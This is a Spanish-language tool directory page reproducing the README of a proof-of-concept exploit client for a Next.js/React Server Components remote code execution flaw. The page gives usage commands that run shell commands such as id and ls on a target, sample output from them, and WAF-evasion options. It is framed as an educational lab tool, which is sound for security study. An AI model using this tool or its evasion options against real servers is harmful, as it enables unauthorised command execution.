Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
react2shell-scanner — Detección Basada en Precisión de Vulnerabilidades de Ejecución Remota de Código en RSC/Next.js (CVE-2025-55182, CVE-2025-66478) | Kitploit
Herramientas/GitHubGitHub/hidden-investigations/react2shell-scanner
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónAprendizaje y Educación
GitHubhidden-investigations/react2shell-scanner

react2shell-scanner

Detección Basada en Precisión de Vulnerabilidades de Ejecución Remota de Código en RSC/Next.js (CVE-2025-55182, CVE-2025-66478)

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver RepositorioSitio web
5hace 6 mesesAún no revisado

Escáner React2Shell – con PoC

CVE-2025-55182 – PoC de RCE en React Server Components
Cliente de exploit educativo para el laboratorio React2Shell de Hidden Investigations.

Este repositorio contiene una herramienta de exploit de prueba de concepto (PoC) para un solo host para la vulnerabilidad React2Shell (CVE-2025-55182) dirigida a aplicaciones React Server Components / Next.js mal configuradas.

Está diseñado para usarse solo contra el laboratorio React2Shell oficial de Hidden Investigations o sistemas que poseas o administres explícitamente.


⚠️ Aviso legal y ético

Este proyecto se proporciona estrictamente para fines educativos e investigación de seguridad defensiva:

  • Usa esta herramienta solo en:
    • El laboratorio React2Shell oficial de Hidden Investigations, o
    • Sistemas que poseas o para los que tengas permiso explícito por escrito para realizar pruebas.
  • No uses esto en sitios web aleatorios, sistemas de producción o infraestructura que no controles.
  • Los autores y Hidden Investigations no asumen ninguna responsabilidad por uso indebido o daños.

Al usar esta herramienta, aceptas cumplir con todas las leyes y regulaciones aplicables.


Características

  • 🔥 Cliente de exploit React2Shell para CVE-2025-55182
  • 🎯 Enfocado en un solo host (sin escaneo masivo)
  • 📡 Soporte para rutas personalizadas y listas de rutas
  • 🧪 Modo de verificación segura (sin comandos del SO, solo una sonda de detección)
  • 🪟 Modo amigable con Windows (whoami por defecto)
  • 🛡️ Ayudantes de bypass de WAF:
    • Campo multipart basura (--waf-bypass, --waf-bypass-size)
    • Ajuste de diseño de Vercel (--vercel-waf-bypass)
  • 🔐 Opciones TLS (--insecure, cabeceras personalizadas)
  • 🧾 Salida JSON (-o/--output, --all-results)
  • 🧘 Salida modo silencioso limpia (perfecta para redirigir a otras herramientas)

Requisitos

  • Python: 3.8+ (probado con Python 3.10+)
  • Dependencias:
    • requests

Instala las dependencias mediante:

root@kitploit:~
pip install -r requirements.txt

Instalación

  1. Clona el repositorio de Hidden Investigations:
root@kitploit:~
git clone https://github.com/hidden-investigations/react2shell-poc.git
cd react2shell-poc
  1. (Opcional pero recomendado) Crea un entorno virtual:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate   # On Windows: venv\Scripts\activate
  1. Instala las dependencias:
root@kitploit:~
pip install -r requirements.txt
  1. Ejecuta la herramienta:
root@kitploit:~
python3 react2shell-scanner.py -h

Uso

Ayuda básica:

root@kitploit:~
python3 react2shell-scanner.py -h

La herramienta requiere una URL objetivo:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 -c "id"
# or
python3 react2shell-scanner.py --url http://localhost:3000 -c "id"

Si la ejecutas sin -t/--target o -u/--url, imprime un mensaje de ayuda con marca y sale.


Opciones de línea de comandos

Objetivo y rutas

Nota: Este PoC es solo para un solo host. La opción -l/--list está presente pero intencionalmente deshabilitada.


Comportamiento del exploit / payload


Opciones HTTP / TLS


Opciones de salida / experiencia de usuario

Ejemplo de modo silencioso (salida limpia de múltiples líneas):

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -q -c "ls -la"

Salida:

root@kitploit:~
total 12
drwxr-xr-x    1 root     root            10 Dec 13 21:13 .
drwxr-xr-x    1 root     root             0 Dec 13 21:13 ..
drwxr-xr-x    1 nextjs   nodejs          12 Dec 13 21:13 .next
drwxr-xr-x    1 nextjs   nodejs         396 Dec 13 21:13 node_modules
-rw-r--r--    1 nextjs   nodejs         733 Dec 13 21:13 package.json
drwxr-xr-x    1 root     root            12 Dec 13 19:13 public
-rw-r--r--    1 nextjs   nodejs        5661 Dec 13 21:13 server.js

Banderas de escaneo masivo (intencionalmente deshabilitadas)

Las siguientes banderas existen para reflejar la CLI de Assetnote, pero no están implementadas en este PoC para evitar el uso indebido de escaneo masivo:

OpciónEstado
-l, --listNo implementada
--threads NNo implementada

Si usas -l/--list, la herramienta mostrará una advertencia y saldrá, sugiriendo que uses el react2shell-scanner original de Assetnote para escaneo seguro a gran escala.


Ejemplos

Ejecutar contra el laboratorio local:

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -c "whoami"

Usar bypass de WAF con un campo basura más grande:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --waf-bypass --waf-bypass-size 256   -c "id"

Múltiples rutas en el mismo host:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path /   --path /_next/data   -c "id"

Rutas desde archivo:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path-file paths.txt   -c "id"

Modo de verificación segura (sin ejecutar comandos del SO):

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 --safe-check

Salida JSON de resultados a archivo:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path / --path /_next   -c "id"   -o results.json --all-results

Formato de salida JSON

Cuando se usa -o/--output, la herramienta escribe un array de objetos como:

root@kitploit:~
[
  {
    "url": "http://localhost:3000/",
    "path": "/",
    "success": true,
    "status": "success",
    "output": "uid=1000(nextjs) gid=1000(nodejs) groups=1000(nodejs)",
    "http": {
      "status_code": 302,
      "headers": {
        "X-Action-Redirect": "NEXT_REDIRECT;push;/login?a=uid%3D1000%28nextjs%29;307;",
        "...": "..."
      }
    }
  }
]

Créditos y agradecimientos

  • Hidden Investigations – por publicar el laboratorio educativo React2Shell y el cliente PoC.
  • @sakibulalikhan – autor de la herramienta.
  • Assetnote – inspiración para ideas de bypass de WAF a través de su react2shell-scanner.

Licencia

Este proyecto está licenciado bajo la Licencia MIT. Consulta LICENSE para más detalles.

📬 Contáctanos: [email protected]

Descargar herramienta
OpciónDescripciónPor defecto
-t, --targetURL o dominio objetivo (requerido a menos que se use --url)Ninguno
-u, --urlAlias de --target (bandera estilo Assetnote)Ninguno
--pathRuta a probar (se puede usar varias veces, ej. /, /_next)/
--path-fileArchivo que contiene rutas a probar (una por línea)Ninguno
OpciónDescripciónPor defecto
-c, --commandComando a ejecutar en el objetivo (cuando la explotación tiene éxito)id
--safe-checkUsar un payload SAFE_CHECK (sin comando del SO, solo una cadena de marcado)desactivado
--windowsAjustar valores predeterminados para objetivos Windows (ej. usar whoami cuando el comando es id)desactivado
--waf-bypassAnteponer un campo multipart basura grande al cuerpo de la solicitud para evasión de WAFdesactivado
--waf-bypass-size KBTamaño del campo basura en KB al usar --waf-bypass128
--vercel-waf-bypassUsar un diseño multipart alternativo para ajustar el comportamiento del WAF de Vercel (PoC simplificado)desactivado
OpciónDescripciónPor defecto
--timeout SECONDSTiempo de espera de la solicitud en segundos15 (o 20 si --waf-bypass y no se estableció tiempo de espera)
-k, --insecureDeshabilitar verificación SSL (como curl -k)desactivado
-H, --headerCabecera personalizada, ej. -H "X-Forwarded-For: 127.0.0.1" (repetible)Ninguno
OpciónDescripciónPor defecto
-o, --output FILEEscribir resultados JSON en FILENinguno
--all-resultsAl usar --output, incluye también resultados no vulnerablesdesactivado
-v, --verboseModo verboso – muestra el estado HTTP y la cabecera X-Action-Redirectdesactivado
-q, --quietModo silencioso – imprime solo la salida normalizada del comando en caso de éxitodesactivado
--no-colorDeshabilitar la salida de terminal coloreadadesactivado